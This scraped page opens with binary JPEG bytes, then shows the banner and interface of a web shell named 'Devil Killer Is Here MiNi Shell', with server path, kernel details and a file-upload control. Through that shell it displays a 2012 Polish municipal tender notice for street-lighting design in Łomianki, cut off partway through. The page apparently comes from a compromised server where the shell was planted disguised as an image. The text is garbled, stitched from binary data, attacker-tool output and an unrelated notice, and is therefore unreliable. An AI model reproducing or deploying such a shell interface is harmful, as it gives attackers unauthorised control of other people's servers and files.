JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120619/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120619/133211-N-2012.html

<p class="kh_header"><b>Łomianki: Wykonanie projektów budowlano-wykonawczych dla zadań:
Część I Wykonanie oświetlenia ul. Sielanki - zad 15/12
Część II Wykonanie oświetlenia w ul. Kopciuszka - zad 12/12
Część III Wykonanie oświetlenia wzdłuż drogi opaskowej na odc. od ul. Konopnickiej do ul. Szymczaka - zad 14/12
Część IV Wykonanie oświetlenia w ul. Bolka i Lolka - zad 13/12
Część V Doświetlenie ul. Miłej oraz ul. Rodziewiczówny przy placu zabaw  - zad 8/12</b><br>
<b>Numer ogłoszenia: 133211 - 2012; data zamieszczenia: 19.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Łomianki , ul. Warszawska 115, 05-092 Łomianki, woj. mazowieckie, tel. 22 7686301, faks 22 7686302.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lomianki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektów budowlano-wykonawczych dla zadań:
Część I Wykonanie oświetlenia ul. Sielanki - zad 15/12
Część II Wykonanie oświetlenia w ul. Kopciuszka - zad 12/12
Część III Wykonanie oświetlenia wzdłuż drogi opaskowej na odc. od ul. Konopnickiej do ul. Szymczaka - zad 14/12
Część IV Wykonanie oświetlenia w ul. Bolka i Lolka - zad 13/12
Część V Doświetlenie ul. Miłej oraz ul. Rodziewiczówny przy placu zabaw  - zad 8/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie  projektów budowlano-wykonawczych dla zadań:Wykonanie oświetlenia ul. Sielanki - zad 15/12,Wykonanie oświetlenia w ul. Kopciuszka - zad 12/12,Wykonanie oświetlenia wzdłuż drogi opaskowej na odc. od ul. Konopnickiej do ul. Szymczaka - zad 14/12,Wykonanie oświetlenia w ul. Bolka i Lolka - zad 13/12,Doświetlenie ul. Miłej oraz ul. Rodziewiczówny przy placu zabaw - zad 8/12

Szczegółowe opisy oraz warunki  realizacji przedmiotu zawarte są w sekcjach ogłoszenia dotyczących poszczególnych części  zamówienia.
Zgodnie z art. 83 ust. 2 i 3 ustawy pzp Zamawiający określa maksymalną liczbę części zamówienia, na które oferty częściowe może złożyć jeden Wykonawca.
Wykonawca może złożyć maksymalnie oferty na  3 części zamówienia.
W przypadku gdy Wykonawca złoży ofertę na większą niż dopuszczoną powyżej liczbę części, Zamawiający w całości odrzuci ofertę na podstawie art. 89 ust. 1 pkt 2 ustawy Pzp, jako nieodpowiadającą treści SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Przedmiot zamówień uzupełniających polega na powtórzeniu tego samego rodzaju zamówień. Zakres jest zgodny z przedmiotem zamówienia podstawowego i stanowi do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu Zamawiający nie wymaga  od Wykonawców wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych
w art. 22 ust.1ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę, że wykonał należycie  minimum dwie usługi polegające na wykonaniu  projektu  budowlano- wykonawczego  oświetlenia ulicznego  o wartości  minimum:

18 000,00 brutto każda dla I części  postępowania,

25 000,00 brutto każda dla II części  postępowania,

28 000,00 brutto każda dla III części  postępowania,

18 000,00 brutto każda dla IV części  postępowania,

28 000,00 brutto każda dla V części  postępowania,

w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych
w art. 22 ust.1ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie wykazania przez Wykonawcę, że dysponuje lub będzie dysponował w czasie realizacji zamówienia osobami posiadającymi uprawnienia budowlane bez ograniczeń do projektowania w specjalności instalacyjnej  w zakresie sieci, instalacji  i urządzeń elektrycznych  i  elektroenergetycznych: 1 osoba.
W przypadku  gdy Wykonawca będzie składał ofertę w dwóch lub trzech  częściach postępowania w celu spełnienia  w.w. warunku udziału  w postępowaniu  może wykazać jedną osobę dla dwóch lub trzech części  postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełnienia warunku nastąpi na podstawie złożonego oświadczenia o spełnieniu warunków udziału w postępowaniu określonych
w art. 22 ust.1ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca wykazując spełnianie warunków, o których mowa w art. 22 ust. 1 ustawy Pzp, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, Zamawiający żąda od Wykonawcy udowodnienia Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - dla części  I-V.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający   przewiduje możliwość dokonania istotnych zmian w  umowie w szczególności:

1)	 W przypadku wystąpienia okoliczności niezależnych od Wykonawcy uniemożliwiających wykonanie przedmiotu umowy w terminie. Zamawiający może przedłużyć termin wykonania przedmiotu umowy o czas niezbędny do jej wykonania. Wykonawca może najpóźniej na 7 dni roboczych przed terminem realizacji poszczególnych prac objętych umową, powiadomić pisemnie Zamawiającego o zamiarze ubiegania się o przedłużenie terminu wykonania poszczególnych prac, dostarczając Zamawiającemu wyczerpujące i szczegółowe uzasadnienie swojego wniosku, pod warunkiem, że przyczyny te nie wynikają z uchybień lub z niedochowania należytej staranności Wykonawcy. Nie złożenie przedmiotowego wniosku w określonym terminie pozbawia Wykonawcę możliwości przedłużenia terminu umowy. Zamawiający ma dwa dni robocze od daty otrzymania pisma na ustosunkowanie się do złożonego wniosku i powiadomienie Wykonawcy o swojej decyzji,
2)	z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością,
w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach,
3)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
4)	w przypadku zmian przepisów prawa oraz wydanych  do  nich aktów wykonawczych  powiązanych z ustawą Pzp lub  przepisami związanymi z przedmiotem zamówienia,
5)	w przypadku wstrzymania wykonywania niniejszej usługi lub przerw  powstałych z przyczyn  leżących po stronie Zamawiającego,
6)	w przypadku  wystąpienia  okoliczności, których  strony   umowy  nie były  w stanie przewidzieć, pomimo  zachowania  należytej  staranności.
Ewentualne przesunięcie terminu zakończenia realizacji przedmiotu umowy nastąpi o tyle dni, przez ile trwały przyczyny, o których mowa powyżej, przy czym wymagają one potwierdzenia przez Przedstawiciela Zamawiającego.
4Wszelkie ewentualne zmiany będą dokonane w formie aneksu i nie będą stanowić podstawy do zwiększenia wynagrodzenia  z wyjątkiem   pkt. 4 .</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.lomianki.pl/bip/index.php?sc=122&m=6<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w  Łomiankach, ul. Warszawska 115 pok. nr 1 , 05-092 Łomianki
cena 20 zl..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 10:00, miejsce: Urząd Miejski w  Łomiankach, ul. Warszawska 115 pok. nr . 1, 05-092 Łomianki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wykonanie oświetlenia  ul. Sielanki - zad 15/12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I etap - przedstawienie projektu koncepcyjnego do akceptacji Zamawiającego,
II etap - wykonanie na podstawie zaakceptowanej przez Zamawiającego koncepcji projektu budowlano - wykonawczego Oświetlenie ul. Sielanki, na długości ok. 110 mb zawierających:
a)	plan zagospodarowania terenu w skali 1:500,
b)	mapę do celów projektowych z zaznaczonymi granicami działek,
c)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o decyzję lokalizacji inwestycji celu publicznego,
d)	projekty budowlano - wykonawcze Oświetlenie ul. Sielanki, na długości ok. 110 mb - po 5 egz. wraz z wersją elektroniczną.
e)	inwentaryzację zieleni wraz z wykazem drzew przewidzianych do wycinki
f)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o zgodę na realizację inwestycji,  
g)	uzgodnienia tras i lokalizacji w ZUD.
h)	przedmiary robót -5 egz. wraz z wersją elektroniczną.
i)	kosztorysy inwestorskie -2 egz. wraz z wersją elektroniczną.
j)	specyfikację techniczną wykonania i odbioru robót - 5 egz. wraz z wersją elektroniczną.
k)	Informację BIOZ - 4 egz.
l)	uzgodnienia z odpowiednimi instytucjami 
Zakres projektów budowlano - wykonawczych powinien zawierać wytyczne i zalecenia zawarte w:
	Prawomocnych decyzjach lokalizacji inwestycji celu publicznego lub zapisach miejscowego planu zagospodarowania przestrzennego,
	Opiniach ZUD
	Prawie Budowlanym,
	Prawie Energetycznym,
	Ustawie o drogach publicznych 
	Rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego
	zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. 202 poz. 2072 z  2 września 2004 r  z póź. zm.)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Wykonanie oświetlenia w ul. Kopciuszka - zad 12/12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I etap -  przedstawienie projektu koncepcyjnego do akceptacji Zamawiającego,
II etap - wykonanie na podstawie zaakceptowanej przez Zamawiającego koncepcji projektu budowlano - wykonawczego Oświetlenie ul. Kopciuszka na odc. ok. 330  mb.,               zawierających:
a)	plan zagospodarowania terenu w skali 1:500,
b)	mapę do celów projektowych z zaznaczonymi granicami działek,
c)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o decyzję lokalizacji inwestycji celu publicznego,
d)	projekty budowlano - wykonawcze Oświetlenie ul. Kopciuszka na odc.                       ok. 330  mb.,  - po 5 egz. wraz z wersją elektroniczną.
e)	inwentaryzację zieleni wraz z wykazem drzew przewidzianych do wycinki
f)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o zgodę na realizację inwestycji,  
g)	uzgodnienia tras i lokalizacji w ZUD.
h)	przedmiary robót -5 egz. wraz z wersją elektroniczną.
i)	kosztorysy inwestorskie -2 egz. wraz z wersją elektroniczną.
j)	specyfikację techniczną wykonania i odbioru robót - 5 egz. wraz z wersją elektroniczną.
k)	Informację BIOZ - 4 egz.
l)	uzgodnienia z odpowiednimi instytucjami 
Zakres projektów budowlano - wykonawczych  powinien zawierać wytyczne i zalecenia zawarte w:
Prawomocnych decyzjach lokalizacji inwestycji celu publicznego lub zapisach miejscowego planu zagospodarowania przestrzennego,
Opiniach ZUD
Prawie Budowlanym,
Prawie Energetycznym,
Ustawie o drogach publicznych 
 Rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego
zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. 202 poz. 2072 z  2 września 2004 r  z póź. zm.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Wykonanie oświetlenia wzdłuż drogi opaskowej na odc. od ul. Konopnickiej do ul. Szymczaka - zad 14/12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I etap -  przedstawienie projektu koncepcyjnego do akceptacji Zamawiającego,
II etap - wykonanie na podstawie zaakceptowanej przez Zamawiającego koncepcji projektu budowlano - wykonawczego Wykonanie oświetlenia wzdłuż drogi opaskowej na odc. od ul. Konopnickiej do ul. Szymczaka, zawierających:
a)	plan zagospodarowania terenu w skali 1:500,
b)	mapę do celów projektowych z zaznaczonymi granicami działek,
c)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o decyzję lokalizacji inwestycji celu publicznego,
d)	projekty budowlano - wykonawcze Wykonanie oświetlenia wzdłuż drogi opaskowej na odc. od ul. Konopnickiej do ul. Szymczaka, - po 5 egz. wraz z wersją elektroniczną.
e)	inwentaryzację zieleni wraz z wykazem drzew przewidzianych do wycinki
f)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o zgodę na realizację inwestycji,  
g)	uzgodnienia tras i lokalizacji w ZUD.
h)	przedmiary robót -5 egz. wraz z wersją elektroniczną.
i)	kosztorysy inwestorskie -2 egz. wraz z wersją elektroniczną.
j)	specyfikację techniczną wykonania i odbioru robót - 5 egz. wraz z wersją elektroniczną.
k)	Informację BIOZ - 4 egz.
l)	uzgodnienia z odpowiednimi instytucjami 
Zakres projektów budowlano - wykonawczych  powinien zawierać wytyczne i zalecenia zawarte w:
Prawomocnych decyzjach lokalizacji inwestycji celu publicznego lub zapisach miejscowego planu zagospodarowania przestrzennego,
Opiniach ZUD
Prawie Budowlanym,
Prawie Energetycznym,
Ustawie o drogach publicznych 
Rozporządzeniu Ministra Infrastruktury z dnia 02 września 2004 r. w sprawie szczegółowego
	zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru budowlanych oraz programu funkcjonalno - użytkowego (Dz.U. 202 poz. 2072 z  2 września 2004 r  z póź. zm.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Wykonanie oświetlenia w ul. Bolka i Lolka- zad 13/12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I etap -  przedstawienie projektu koncepcyjnego do akceptacji Zamawiającego,
II etap - wykonanie na podstawie zaakceptowanej przez Zamawiającego koncepcji projektu budowlano - wykonawczego Oświetlenie ul. Bolka i Lolka, na długości ok. 230 mb zawierających:
a)	plan zagospodarowania terenu w skali 1:500,
b)	mapę do celów projektowych z zaznaczonymi granicami działek,
c)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o decyzję lokalizacji inwestycji celu publicznego,
d)	projekty budowlano - wykonawcze Oświetlenie ul. Bolka i Lolka, na długości ok. 230 mb - po 5 egz. wraz z wersją elektroniczną.
e)	inwentaryzację zieleni wraz z wykazem drzew przewidzianych do wycinki
f)	przygotowanie materiałów i uzyskanie uzgodnień  niezbędnych do wystąpienia o zgodę na realizację inwestycji,  
g)	uzgodnienia tras i lokalizacji w ZUD.
h)	przedmiary robót -5 egz. wraz z wersją elektroniczną.
i)	kosztorysy inwestorskie -2 egz. wraz z wersją elektroniczną.
j)	specyfikację techniczną wykonania i odbioru robót - 5 egz. wraz z wersją elektroniczną.
k)	Informację BIOZ - 4 egz.
l)	uzgodnienia z odpowiednimi instytucjami 
Zakres projektów budowlano - wykonawczych  powinien zawierać wytyczne i zalecenia zawarte w:
